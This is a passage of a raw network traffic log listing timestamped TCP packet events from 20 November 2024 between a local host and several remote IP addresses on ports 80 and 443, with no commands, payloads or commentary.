                                                                                                                                                                                                Nov 20, 2024 10:54:35.056998014 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.057013035 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.057029009 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.057069063 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:35.057167053 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.057182074 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.057195902 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.057210922 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:35.057210922 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.057248116 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:35.060655117 CET4434982013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.061228991 CET49820443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:35.061234951 CET4434982013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.061933994 CET49820443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:35.061938047 CET4434982013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.072727919 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.072782040 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:35.072822094 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.072837114 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.072860956 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.072876930 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.072890997 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.072895050 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:35.072907925 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.072909117 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:35.072923899 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.072952986 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:35.072964907 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.072982073 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.073020935 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:35.073036909 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.073051929 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.073067904 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.073080063 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:35.073082924 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.073100090 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.073117971 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:35.073132992 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:35.073843956 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.073858976 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.073888063 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.073904037 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.073937893 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:35.073976994 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:35.077837944 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.077852964 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.077871084 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.077883005 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.077907085 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:35.077939987 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:35.139509916 CET4434982313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.140690088 CET49823443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:35.140706062 CET4434982313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.141151905 CET49823443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:35.141158104 CET4434982313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.146940947 CET4434981913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.147054911 CET4434981913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.147118092 CET49819443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:35.147310972 CET49819443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:35.147336006 CET4434981913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.147346020 CET49819443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:35.147351980 CET4434981913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.150499105 CET49826443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:35.150515079 CET4434982613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.150587082 CET49826443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:35.150826931 CET49826443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:35.150836945 CET4434982613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.152295113 CET4434982213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.152812958 CET49822443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:35.152818918 CET4434982213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.153448105 CET49822443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:35.153450966 CET4434982213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.163409948 CET4434982013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.163474083 CET4434982013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.163552046 CET49820443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:35.163665056 CET49820443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:35.163670063 CET4434982013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.163692951 CET49820443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:35.163697958 CET4434982013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.166290998 CET49827443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:35.166326046 CET4434982713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.166480064 CET49827443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:35.167107105 CET49827443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:35.167118073 CET4434982713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.190324068 CET4434981620.109.210.53192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.190345049 CET4434981620.109.210.53192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.190352917 CET4434981620.109.210.53192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.190380096 CET4434981620.109.210.53192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.190411091 CET4434981620.109.210.53192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.190412045 CET49816443192.168.2.720.109.210.53
                                                                                                                                                                                                Nov 20, 2024 10:54:35.190433979 CET4434981620.109.210.53192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.190445900 CET49816443192.168.2.720.109.210.53
                                                                                                                                                                                                Nov 20, 2024 10:54:35.190454006 CET49816443192.168.2.720.109.210.53
                                                                                                                                                                                                Nov 20, 2024 10:54:35.190476894 CET49816443192.168.2.720.109.210.53
                                                                                                                                                                                                Nov 20, 2024 10:54:35.191056013 CET4434981620.109.210.53192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.191122055 CET49816443192.168.2.720.109.210.53
                                                                                                                                                                                                Nov 20, 2024 10:54:35.191131115 CET4434981620.109.210.53192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.191422939 CET4434981620.109.210.53192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.191464901 CET49816443192.168.2.720.109.210.53
                                                                                                                                                                                                Nov 20, 2024 10:54:35.244977951 CET4434982313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.245125055 CET4434982313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.245187998 CET49823443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:35.245345116 CET49823443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:35.245358944 CET4434982313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.245371103 CET49823443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:35.245377064 CET4434982313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.248903036 CET49829443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:35.248961926 CET4434982913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.249033928 CET49829443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:35.249300003 CET49829443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:35.249321938 CET4434982913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.259203911 CET4434982213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.259562016 CET4434982213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.259592056 CET4434982213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.259654045 CET49822443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:35.259708881 CET49822443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:35.259708881 CET49822443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:35.259716034 CET4434982213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.259721994 CET4434982213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.262522936 CET49830443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:35.262566090 CET4434983013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.262661934 CET49830443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:35.262850046 CET49830443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:35.262865067 CET4434983013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.289963007 CET4434982413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.290435076 CET49824443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:35.290445089 CET4434982413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.290966034 CET49824443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:35.290971041 CET4434982413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.299937963 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:35.304866076 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.304883003 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.304908991 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.304924965 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.304924965 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:35.304939985 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.304960012 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.304961920 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:35.304976940 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.304991007 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.305011988 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:35.305013895 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.305038929 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.305053949 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:35.305054903 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.305063009 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.305087090 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.305088997 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:35.305104017 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.305118084 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:35.305120945 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.305138111 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.305149078 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:35.305155039 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.305172920 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.305180073 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:35.305187941 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.305207968 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.305228949 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:35.305229902 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.305253029 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.305253983 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:35.305269957 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.305284023 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.305295944 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:35.305299044 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.305322886 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:35.305325031 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.305350065 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.305365086 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.305397034 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:35.305397987 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.305416107 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.305427074 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:35.305432081 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.305449963 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.305460930 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:35.305466890 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.305481911 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.305496931 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.305500031 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:35.305512905 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.305531025 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:35.305536985 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.305552959 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.305555105 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:35.305568933 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.305583000 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.305589914 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:35.305598974 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.305613995 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.305629015 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.305644035 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.305655003 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:35.305655003 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:35.305660009 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.305679083 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.305689096 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:35.305695057 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.305713892 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:35.305722952 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.305748940 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.305764914 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.305773020 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:35.305778980 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.305804014 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:35.305804014 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.305824041 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.305839062 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.305840969 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:35.305855036 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.305870056 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.305886030 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.305900097 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.305905104 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:35.305916071 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.305929899 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.305932999 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:35.305954933 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.305969954 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:35.305970907 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.305989981 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.306005001 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.306020975 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.306034088 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.306036949 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:35.306051016 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.306063890 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:35.306082010 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:35.306096077 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.306112051 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.306127071 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.306143045 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.306157112 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:35.306158066 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.306174040 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.306178093 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:35.306190014 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.306202888 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:35.306206942 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.306225061 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:35.306231976 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.306246996 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.306263924 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.306268930 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:35.306279898 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.306294918 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.306308031 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:35.306309938 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.306325912 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.306339979 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:35.306339979 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.306359053 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.306374073 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:35.306375980 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.306394100 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.306402922 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:35.306410074 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.306427002 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:35.360121012 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:35.394385099 CET4434982413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.394700050 CET4434982413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.394747019 CET49824443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:35.394948006 CET49824443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:35.394954920 CET4434982413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.394959927 CET49824443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:35.394963980 CET4434982413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.397782087 CET49831443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:35.397825956 CET4434983113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.398215055 CET49831443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:35.398376942 CET49831443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:35.398392916 CET4434983113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.495410919 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:35.500415087 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.500443935 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.500461102 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.500477076 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.500499010 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.500499010 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:35.500525951 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.500528097 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:35.500544071 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.500559092 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.500575066 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.500582933 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:35.500592947 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.500603914 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:35.500610113 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.500627995 CET8049812185.215.113.16192.168.2.7
